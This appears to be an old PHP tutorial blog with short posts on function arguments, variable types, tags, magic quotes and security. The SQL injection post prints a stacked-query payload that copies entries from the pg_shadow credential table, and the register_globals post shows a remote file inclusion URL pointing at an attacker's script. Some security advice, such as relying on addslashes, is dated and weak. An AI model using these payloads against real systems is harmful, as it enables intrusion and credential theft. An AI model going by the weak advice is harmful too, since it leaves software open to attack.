PHP Tutorial, PHP scripts, Free PHP Programming Information

Function Arguments

2009-10-04T06:26:00.000-07:00

Hello All,

You can pass information to function via argument list.There are following ways to pass information.

1.Pass By Reference

function calculatepagesize(&$num_records){
//sql queries and get tot number of records.
$num_records = $total_records;
}
$num_records=0;
calculatepagesize($num_records);
echo $num_records;

In this case, There is no need to return statement.

2.Pass By Value

function calculatepagesize($num_records){
//sql queries and get tot number of records.
$num_records = $total_records;
return $num_records;
}
$num_records=0;
calculatepagesize($num_records);
echo $num_records;

In this case, There is need to return statement.

3.Default Argument Values

For example:

function A($flag=false){
if($flag){
execute condition1
}else{
execute condition2
}
}

call: A();
call: A($flag);

4.correct way of default arguments

function A($arg1,$arg2="NULL"){
}

5.incorrect way of default arguments

function B($arg2="NULL",$arg1){
}

Enjoy!!!

Function In PHP

2009-10-04T06:17:00.000-07:00

Hello All,

1.All functions and classes in PHP have the global scope - they can be called outside a function even if they were defined inside and vice versa.

2.PHP does not support function overloading, nor is it possible to undefine or redefine previously-declared functions.

3.Function names are case-insensitive, though it is usually good form to call functions as they appear in their declaration.

4.It is possible to call recursive functions in PHP. However avoid recursive function/method calls with over 100-200 recursion levels as it can smash the stack and cause a termination of the current script.

Best Wishes!

HTTP authentication with PHP

2009-09-27T01:38:00.000-07:00

Hello All,

The HTTP Authentication hooks in PHP are only available when it is running as an Apache module and is hence not available in the CGI version.

Enjoy!

Hiding PHP From Attackers

2009-09-27T01:29:00.000-07:00

Hello All,

you can simply hide php to slow down attacker to find out the weakness of your system.

this can possible using .htaccess or apache configuration file.

Hide PHP as another language
AddType application/x-httpd-php .asp .pl

Hide PHP as html
AddType application/x-httpd-php .html .htm

Enjoy!!

Magic Quotes

2009-09-27T01:18:00.000-07:00

Hello All,

magic_quotes_gpc (default on)
it will affects http request data ($_GET,$_POST,$REQUEST).
it will not set by runtime.

magic_quotes_runtime (default off)
if on, then it will replace quotes with backslashes while returning data from database or files or external sources.
can be set runtime.

magic_quotes_sybase (default off)
if on, then single quote escaped with single quote.if magic_quotes_sybase and magic_quotes_gpc both are on, then only single quote escaping possible.double quote,backslashes,NULL remain untouch or unescaped.

Enjoy!!!

SQL Injection

2009-09-27T00:41:00.000-07:00

Hello All,

Beware before executing any sql query without validating type of any input parameter which is concated with query!

For Example:

if(!$offset){
$offset = 5;
}

$query = "select id, name from customer order by name LIMIT 0,$offset;";

Now above query will be tempered by following url.

any one can pass $offset value like below;

0;insert attacher_db(username,password)select 'crack', usesysid from pg_shadow where usename='postgres';

the same way, anyone can attack on database hosts operating system by passing sql command.

How to avoid this type of attacks?

1. Never connect database using superuser or root user.always create customized user with limited privileges.

2. Check data type of given input parameter

3. Check numercial type using is_numeric or convert data type or use sprintf function to write sql query for integer values.

4. quote each non-numeric values by using database escaping function like mysql_escape_string or addslashes or str_replace

Hope above information will help you more.

Enjoy!!!

Security Issue With Register Globals

2009-09-06T04:13:00.000-07:00

Hello All,

There are some security concerns when register_globals on.

If it is on, then anyone can inject malicious code in your script if your code didn't validate incoming data appropriately.

For Example,

if(checklogin()){
$valid_user=true;
}

if($valid_user){
include("/script/data/profile.php");
}

In the above case, someone can do break on this by just passing auth.php?$valid_user=1;

It is good practice that always initialize variables and always check incoming data coming from right request and in right format.

register_global = ON, also invite virus attach if your code is not proper validating incoming data.

this can be possible by remote file inclusion.

for example:

if your code include file like below,

include($file.'php');

it is good for local file but, it is risky because anyone can easily remotely include their file like below.

http://yourdomain.com/index.php?$file='http://xyz.com/attacker.php';

If you know ahead of time exactly where a variable should be coming from, you can check to see if the submitted data is coming from an inappropriate kind of submission. While it doesn't guarantee that data has not been forged, it does require an attacker to guess the right kind of forging.

Hope this information help you lot.

Best Wishes!!!

$GLOBALS exists in any scope

2009-08-05T00:34:00.000-07:00

Hello All,

We can use $GLOBALS instead of global type because it is superglobal and associative array.

Example 1:

$name='Gaurang Bhatt';
function demo(){
global $name;
echo $name;
}

Example 2:

$name="Gaurang Bhatt";
function demo(){
echo $GLOBALS['name'];
}

Enjoy!

Best Wishes!

Some Facts about Variable Types in PHP

2009-08-04T23:44:00.000-07:00

Hello All,

Kindly see following facts.

1. To assign boolean literal, use either TRUE or FALSE and it is case-insensitive.
2. Following Values count as FALSE in case of boolean.

FALSE itself equals to FALSE
integer 0 equals to FALSE
float 0.00 equals to FALSE
empty string equals to FALSE
string '0' equals to FALSE
array with zero elements equals to FALSE
object with zero members equals to FALSE
NULL Type equals to FALSE

3. Integer overflow

If you assign number beyond bounds of integer type, then it is convert into Float Type Value.

4. Type casting for Integer.

FALSE convert in 0.
TRUE convert in 1.
Float convert to rounded towards zero.

If the float is beyond the boundaries of integer (usually +/- 2.15e+9 = 2^31), the result is undefined, since the float hasn't got enough precision to give an exact integer result. No warning, not even a notice will be issued in this case!

5.If a dollar sign ($) is encountered, the parser will greedily take as many tokens as possible to form a valid variable name. Enclose the variable name in curly braces if you want to explicitly specify the end of the name.

6.Characters within strings may be accessed and modified by specifying the zero-based offset of the desired character after the string in curly braces.

PHP Opening and Closing Tags

2009-08-04T23:25:00.000-07:00

Hello All,

Kindly see following checklist before using opening and closing tags of php.it is required to see version of php.

1.  <?php echo 'This is common way to use php tags.'; ?>

2.  <script language="php">

        echo 'some editors (like FrontPage) don\'t

              like processing instructions';

    </script>

3.  <? echo 'this is simple way but this is depend on php version and configuration'; ?>

    <?= expression ?> This is a shortcut for "<? echo expression ?>"

4.  <% echo 'You may optionally use ASP-style tags'; %>

    <%= $variable; # This is a shortcut for "<% echo . . ." %>

Example 1 is most common way and available with all php version and configuration.
Example 2 is same as Example 1.
Example 3 is depend on short_open_tag enabled in php.ini configuration file directive.
Example 4 is depend on asp_tags enabled in php.ini configuration file directive.

Enjoy!!

Best Wishes

Checklist before Using Old PHP Code with new version of PHP.

2009-08-04T22:51:00.000-07:00

Hello All,

Kindly see following check list before using old code of php with newer version of php.

1)In PHP 4.1.0, autoglobal arrays like $_GET,$_POST,$_SERVER,$HTTP_POST_VARS are available but in PHP 5.0.0, these all may be disable with register_long_arrays directive.

2)In PHP 4.2.0, the PHP directive register_globals is off by default in php.ini so, preferred method to access these values by using autoglobal arrays.

For example,

http://example.com/index.php?id=4

If older script use $id to access value instead of $_GET['id'] then if register_globals directive is off, then you can't get value of $id.

So, Best way is that whether register_globals off or on use $_GET['id'].

PHP Tutorial for getting system Information

2009-05-08T02:44:00.000-07:00

Hello All,

Now that you have successfully created a working PHP script, it is time to create the most famous PHP script! Make a call to the phpinfo() function and you will see a lot of useful information about your system and setup such as available predefined variables, loaded PHP modules, and configuration settings. Take some time and review this important information.

Get system information from PHP

<?php phpinfo(); ?>

Enjoy!!!

Your First PHP tutorial

2009-05-07T22:45:00.000-07:00

Create a file named first_tutorial.php and put it in your web server's root directory (DOCUMENT_ROOT) with the following content:

Our first PHP script: first_tutorial.php

<?php echo '<p>Hello World</p>'; ?>

Use your browser to access the file with your web server's URL, ending with the "/first_tutorial.php" file reference. When developing locally this URL will be something like http://localhost/first_tutorial.php or http://127.0.0.1/first_tutorial.php but this depends on the web server's configuration. If everything is configured correctly, this file will be parsed by PHP and the following output will be sent to your browser:

Enjoy!!!